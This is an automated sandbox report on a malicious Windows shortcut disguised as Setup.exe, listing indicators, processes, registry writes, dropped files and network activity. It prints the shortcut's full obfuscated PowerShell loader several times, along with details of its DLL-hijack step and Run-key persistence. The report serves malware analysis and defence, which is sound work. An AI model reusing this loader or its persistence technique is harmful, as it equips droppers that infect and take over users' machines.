File name:

Setup.exe

Full analysis: https://app.any.run/tasks/15b45814-09ca-42b1-886f-3e4fa15db58a
Verdict: Malicious activity
Analysis date: March 15, 2024, 09:17:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Has Description string, Has command line arguments, Icon number=13, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized
MD5:

8E37E230E3707CED709DC00DCBFD2ABF

SHA1:

06D311A6DB6CA9A6BCF15630BE7E9C6CE8098DA4

SHA256:

2D83B80D9645B3A871FA5BEE4FF74E47926E053A4B64F15ED1725E89D2099B5B

SSDEEP:

3072:tMGwx6nZ7tKPUqDnr06tMThIKLHuxJAXjEVvQwmJnjF/09bV2h/QsaUV7ZTphvCu:hnZ7IUqfrMnLOQXwQwcT6Wd1hvCaVt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1912)

    • The DLL Hijacking

      • Setup.exe (PID: 3532)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 1912)
      • Setup.exe (PID: 3532)

    • Changes the autorun value in the registry

      • Setup.exe (PID: 3532)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • conhost.exe (PID: 1404)

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 1912)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 1912)
      • Setup.exe (PID: 3532)

    • Starts a Microsoft application from unusual location

      • Setup.exe (PID: 3532)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1912)
      • Setup.exe (PID: 3532)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1192)

    • Reads security settings of Internet Explorer

      • Setup.exe (PID: 3532)

    • Creates file in the systems drive root

      • Acrobat.exe (PID: 6360)
      • Acrobat.exe (PID: 6592)

  • INFO

    • Checks supported languages

      • Setup.exe (PID: 3532)
      • acrobat_sl.exe (PID: 6324)

    • Reads the computer name

      • Setup.exe (PID: 3532)

    • The executable file from the user directory is run by the Powershell process

      • Setup.exe (PID: 3532)

    • Application launched itself

      • Acrobat.exe (PID: 6360)
      • AcroCEF.exe (PID: 2012)

    • Checks proxy server information

      • Setup.exe (PID: 3532)

    • Executable content was dropped or overwritten

      • AdobeARM.exe (PID: 4272)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath
FileAttributes: (none)
TargetFileSize: -
IconIndex: 13
RunWindow: Show Minimized No Activate
HotKey: (none)
Description: Type: Text Document Size: 391,2KB KB Date modified: 30/11/2024 14:56
CommandLineArguments: --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = '%TMP%\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf
IconFileName: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
150
Monitored processes
20
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start conhost.exe no specs cmd.exe no specs powershell.exe setup.exe acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs adobearm.exe acrobat_sl.exe no specs acrocef.exe no specs slui.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1192cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdfC:\Windows\System32\cmd.execonhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1404"C:\WINDOWS\system32\conhost.exe" --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdfC:\Windows\System32\conhost.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1912powershell -windowstyle hidden Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk | Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk | where-object {$_.length -eq 00196182} | Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force | Out-Null;& .\Setup.exe;& .\*.pdfC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
2012"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcrobat.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2432"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2720"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2136 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3052"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --first-renderer-process --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2400 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3532"C:\Users\admin\AppData\Local\Temp\Setup.exe"C:\Users\admin\AppData\Local\Temp\Setup.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Device Census
Exit code:
0
Version:
10.0.19645.1016 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\users\admin\appdata\local\temp\dcntel.dll
3816"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2584 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3868"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2600 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
36 834
Read events
36 695
Write events
136
Delete events
3

Modification events

(PID) Process:(1912) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts
Operation:writeName:Acrobat.Document.DC_.pdf
Value:
0
(PID) Process:(1912) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(1912) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1912) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1912) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1912) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6360) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(3532) Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:EdgeMicrosoft
Value:
C:\Users\Public\Edge\MicrosoftEdgeUpdate.exe
(PID) Process:(6592) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(6592) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
Executable files
5
Suspicious files
128
Text files
32
Unknown types
33

Dropped files

PID
Process
Filename
Type
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a0iu3ads.gr1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1912powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:94FF6F29E964D6A33A199D64D412BC35
SHA256:0C62D58DD47F1EA0C0A098A45E5DBE190B094C87472919D3A401895254193F77
6592Acrobat.exeC:\USERS\ADMIN\APPDATA\LOCAL\ADOBE\ACROBAT\DC\SOPHIA\ACROBAT\SOPHIA.JSONbinary
MD5:79270D9595B259B53E39403366436A8E
SHA256:AD0552A8B392315C512F6DC945F318AD83B98FB64415C0CED694843A3C5D2083
1912powershell.exeC:\Users\admin\AppData\Local\Temp\Setup.exeexecutable
MD5:D1B722A188C84E5059765FA87E8C5F32
SHA256:1041623963E1A109B80312CBFE4DC4544CBAC478C2EB2597CA040E1C78585A3E
6592Acrobat.exeC:\USERS\ADMIN\APPDATA\LOCAL\TEMP\ACROBAT_SBX\ACRONGLLOG.TXTtext
MD5:E76040843F10E6ABE2422D4D38BCA97E
SHA256:9BCEAF5B9B999FF09A4D0410BE0A01E5DB313FC5C23084D4786DE6D3D6BE4D8B
1912powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:F8EAA4B98C819E638E890A096F4ECF27
SHA256:9819008B53BCB574BA1533D381A5496ECF0B597A4826A48CE7A5F8BB99ABC8A6
6592Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2024-03-15 09-17-52-501.logtext
MD5:084B0D9635A91FB971E8B38DCA71D5CF
SHA256:B0B13A90981DF4A91512D3A2D86D693D7298F476F8B9022D8F8BD16AC25C375F
6592Acrobat.exeC:\USERS\ADMIN\APPDATA\LOCAL\ADOBE\ACROBAT\DC\SHAREDDATAEVENTSsqlite
MD5:138FF48CF99ABB957CB07D3C44918D71
SHA256:29078610DA7C3A129662CF431FD16C2DF60C7D644885DDB5A3272901C94CA0E4
2012AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RFe2352.TMPtext
MD5:FCD96552DAA6924F8C1E9C378163E2C9
SHA256:E8EC8E1501E489B27B564C363F4E60963DD57180453B35B092A4B3769E7AA5CA
2012AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old~RFe2381.TMPtext
MD5:E26AF4B6A1AD62E54D67510EEFE20B2C
SHA256:BF001234CF5F261254DEA1EA459BBFD4A35D15166C765CA3ED9B56D49A04BE1B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
43
DNS requests
26
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4272
AdobeARM.exe
GET
200
2.22.242.136:80
http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt
unknown
text
4 b
unknown
4272
AdobeARM.exe
GET
404
2.22.242.136:80
http://acroipm2.adobe.com/assets/Owner/arm/2024/3/UC/Other.txt
unknown
html
353 b
unknown
4272
AdobeARM.exe
GET
200
2.22.242.136:80
http://acroipm2.adobe.com/assets/Owner/arm/ProcessMAU.txt
unknown
text
4 b
unknown
4272
AdobeARM.exe
GET
404
2.22.242.136:80
http://acroipm2.adobe.com/assets/Owner/arm/2024/3/OwnerAPI/Rdr.txt
unknown
html
357 b
unknown
4272
AdobeARM.exe
GET
404
2.22.242.136:80
http://acroipm2.adobe.com/assets/Owner/arm/11/adnme/NoValidReasonForAdnme.txt
unknown
html
368 b
unknown
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
1088
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
binary
314 b
unknown
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
4352
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
6360
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
binary
471 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4828
svchost.exe
239.255.255.250:1900
unknown
3996
svchost.exe
20.190.160.17:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1280
MoUsoCoreWorker.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2720
AcroCEF.exe
23.43.60.134:443
geo2.adobe.com
Akamai International B.V.
US
unknown
4272
AdobeARM.exe
2.22.242.136:80
acroipm2.adobe.com
Akamai International B.V.
DE
unknown
5904
svchost.exe
88.221.124.138:443
armmf.adobe.com
AKAMAI-AS
DE
unknown
2720
AcroCEF.exe
34.237.241.83:443
p13n.adobe.io
AMAZON-AES
US
unknown
3996
svchost.exe
40.126.32.68:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
3996
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1088
backgroundTaskHost.exe
2.19.96.19:443
www.bing.com
Akamai International B.V.
DE
unknown

DNS requests

Domain
IP
Reputation
NGlzOiV5LX2wNWZvNyF.ns1.truecorps.co.th
unknown
IVEGH3IKFX3PI1wNHlwV.ns1.truecorps.co.th
unknown
geo2.adobe.com
  • 23.43.60.134
whitelisted
acroipm2.adobe.com
  • 2.22.242.136
  • 2.22.242.130
  • 2.22.242.113
  • 2.22.242.123
  • 2.22.242.105
  • 2.22.242.121
  • 2.22.242.128
  • 2.22.242.137
  • 2.22.242.138
  • 104.124.11.64
  • 104.124.11.43
whitelisted
armmf.adobe.com
  • 88.221.124.138
whitelisted
p13n.adobe.io
  • 34.237.241.83
  • 18.213.11.84
  • 54.224.241.105
  • 50.16.47.176
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
IVEGH3IKFX3PI1wNHlwV.ns2.truecorps.co.th
unknown
www.bing.com
  • 2.19.96.19
  • 2.19.96.34
  • 2.19.96.9
  • 2.19.96.18
  • 2.19.96.16
  • 2.19.96.26
  • 2.19.96.115
  • 2.19.96.120
  • 2.19.96.123
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Setup.exe